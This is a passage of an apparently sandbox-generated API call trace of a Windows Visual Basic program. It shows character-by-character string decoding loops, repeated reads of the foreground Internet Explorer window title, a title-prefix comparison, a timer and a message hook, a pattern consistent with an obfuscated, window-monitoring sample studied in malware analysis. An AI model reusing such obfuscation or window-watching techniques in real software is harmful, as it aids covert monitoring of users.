lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0176.777] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.777] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0176.777] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.777] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0176.778] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.778] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0176.778] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.778] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0176.779] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.779] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0176.779] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.780] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0176.780] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.780] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0176.780] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.781] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0176.781] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.781] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0176.781] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0176.781] GetForegroundWindow () returned 0x10162 [0176.791] GetLastError () returned 0x0 [0176.791] SysStringLen (param_1=" ") returned 0xff [0176.791] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=255, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 255 [0176.792] SysStringLen (param_1=" ") returned 0xff [0176.792] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=256, lpMultiByteStr=0x11644c4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" ", lpUsedDefaultChar=0x0) returned 256 [0176.792] GetWindowTextA (in: hWnd=0x10162, lpString=0x11644c4, nMaxCount=255 | out: lpString="Blank Page - Windows Internet Explorer") returned 38 [0176.792] GetLastError () returned 0x0 [0176.792] SysStringByteLen (bstr="求湡慐敧ⴠ圠湩潤獷䤠瑮牥敮⁴硅汰牯牥 ††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0176.792] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Blank Page - Windows Internet Explorer", cbMultiByte=255, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 255 [0176.792] SysStringByteLen (bstr="求湡慐敧ⴠ圠湩潤獷䤠瑮牥敮⁴硅汰牯牥 ††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0176.792] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Blank Page - Windows Internet Explorer", cbMultiByte=256, lpWideCharStr=0x114bcc4, cchWideChar=511 | out: lpWideCharStr="Blank Page - Windows Internet Explorer") returned 256 [0176.793] SysStringLen (param_1="Bla") returned 0x3 [0176.793] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Bla", cchWideChar=4, lpMultiByteStr=0x11684fc, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Bla", lpUsedDefaultChar=0x0) returned 4 [0176.793] SetWindowTextA (hWnd=0x103c4, lpString="Bla") returned 1 [0176.793] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x4 [0176.793] GetFocus () returned 0x0 [0176.794] lstrlenA (lpString="Bla") returned 3 [0176.794] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xc, wParam=0x0, lParam=0x11684fc) returned 0x1 [0176.794] IsWindow (hWnd=0x103c4) returned 1 [0176.794] IsWindow (hWnd=0x103c4) returned 1 [0176.795] IsWindow (hWnd=0x103c4) returned 1 [0176.799] IsWindow (hWnd=0x103c4) returned 1 [0176.800] GetFocus () returned 0x0 [0176.800] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x3 [0176.800] GetFocus () returned 0x0 [0176.800] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x4) returned 0x10ebcd0 [0176.800] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xd, wParam=0x4, lParam=0x10ebcd0) returned 0x3 [0176.801] GetFocus () returned 0x0 [0176.801] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Bla", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 4 [0176.801] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Bla", cbMultiByte=-1, lpWideCharStr=0x11684fc, cchWideChar=4 | out: lpWideCharStr="Bla") returned 4 [0176.801] HeapFree (in: hHeap=0x10d0000, dwFlags=0x0, lpMem=0x10ebcd0 | out: hHeap=0x10d0000) returned 1 [0176.801] VarCmp (pvarLeft=0x28f190, pvarRight=0x28f1f8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0176.802] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0176.803] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0176.803] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0176.803] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0176.803] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0176.803] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0176.804] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0176.804] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0176.804] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0176.804] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0176.804] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0176.805] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0176.805] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0176.805] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0176.805] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0176.806] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0176.806] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0176.806] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0176.806] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0176.807] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0176.807] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0176.807] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0176.807] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0176.807] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0176.808] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0176.808] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0176.808] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0176.808] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0176.809] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0176.809] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0176.809] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0176.809] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0176.810] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0176.810] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0176.810] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0176.898] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0176.898] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0176.898] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0176.898] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0176.898] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0176.899] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0176.899] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0176.899] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0176.899] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0176.900] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0176.900] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0176.900] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0176.900] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0176.901] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0176.901] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0176.901] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0176.901] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0176.902] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0176.902] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0176.902] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0176.902] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0176.903] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0176.903] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0176.903] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0176.903] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0176.904] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0176.904] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0176.909] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0176.909] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0176.909] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0176.909] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0176.909] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0176.910] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0176.910] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0176.910] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0176.910] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0176.911] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0176.911] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0176.911] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0176.911] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0176.912] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0176.912] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0176.912] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0176.912] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0176.912] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0176.913] GetForegroundWindow () returned 0x10162 [0176.913] GetLastError () returned 0x0 [0176.913] SysStringLen (param_1=" ") returned 0xff [0176.913] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=255, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 255 [0176.913] SysStringLen (param_1=" ") returned 0xff [0176.913] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=256, lpMultiByteStr=0x11644c4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" ", lpUsedDefaultChar=0x0) returned 256 [0176.913] GetWindowTextA (in: hWnd=0x10162, lpString=0x11644c4, nMaxCount=255 | out: lpString="Blank Page - Windows Internet Explorer") returned 38 [0176.914] GetLastError () returned 0x0 [0176.914] SysStringByteLen (bstr="求湡慐敧ⴠ圠湩潤獷䤠瑮牥敮⁴硅汰牯牥 ††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0176.914] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Blank Page - Windows Internet Explorer", cbMultiByte=255, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 255 [0176.914] SysStringByteLen (bstr="求湡慐敧ⴠ圠湩潤獷䤠瑮牥敮⁴硅汰牯牥 ††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0176.914] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Blank Page - Windows Internet Explorer", cbMultiByte=256, lpWideCharStr=0x114bcc4, cchWideChar=511 | out: lpWideCharStr="Blank Page - Windows Internet Explorer") returned 256 [0176.914] SysStringLen (param_1="Bl") returned 0x2 [0176.915] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Bl", cchWideChar=3, lpMultiByteStr=0x116859c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Bl", lpUsedDefaultChar=0x0) returned 3 [0176.915] SetWindowTextA (hWnd=0x103c4, lpString="Bl") returned 1 [0176.915] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x3 [0176.915] GetFocus () returned 0x0 [0176.915] lstrlenA (lpString="Bl") returned 2 [0176.915] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xc, wParam=0x0, lParam=0x116859c) returned 0x1 [0176.916] IsWindow (hWnd=0x103c4) returned 1 [0176.916] IsWindow (hWnd=0x103c4) returned 1 [0176.916] IsWindow (hWnd=0x103c4) returned 1 [0176.916] IsWindow (hWnd=0x103c4) returned 1 [0176.917] GetFocus () returned 0x0 [0176.917] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x2 [0176.917] GetFocus () returned 0x0 [0176.917] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x3) returned 0x10ebcd0 [0176.917] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xd, wParam=0x3, lParam=0x10ebcd0) returned 0x2 [0176.917] GetFocus () returned 0x0 [0176.918] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Bl", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 3 [0176.918] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Bl", cbMultiByte=-1, lpWideCharStr=0x116859c, cchWideChar=3 | out: lpWideCharStr="Bl") returned 3 [0176.918] HeapFree (in: hHeap=0x10d0000, dwFlags=0x0, lpMem=0x10ebcd0 | out: hHeap=0x10d0000) returned 1 [0176.918] VarBstrCmp (bstrLeft="Bl", bstrRight="Sc", lcid=0x0, dwFlags=0x30001) returned 0x0 [0176.918] SetTimer (hWnd=0x103bc, nIDEvent=0x103bc, uElapse=0x64, lpTimerFunc=0x0) returned 0x103bc [0176.919] PeekMessageA (in: lpMsg=0x28f564, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x28f564) returned 1 [0176.919] CallNextHookEx (hhk=0x1602c7, nCode=0, wParam=0x0, lParam=0x28f4cc) returned 0x0 [0176.919] PeekMessageA (in: lpMsg=0x28f5e8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x28f5e8) returned 1 [0176.919] CallNextHookEx (hhk=0x1602c7, nCode=0, wParam=0x1, lParam=0x28f54c) returned 0x0 [0176.919] TranslateMessage (lpMsg=0x28f5e8) returned 0 [0176.919] DispatchMessageA 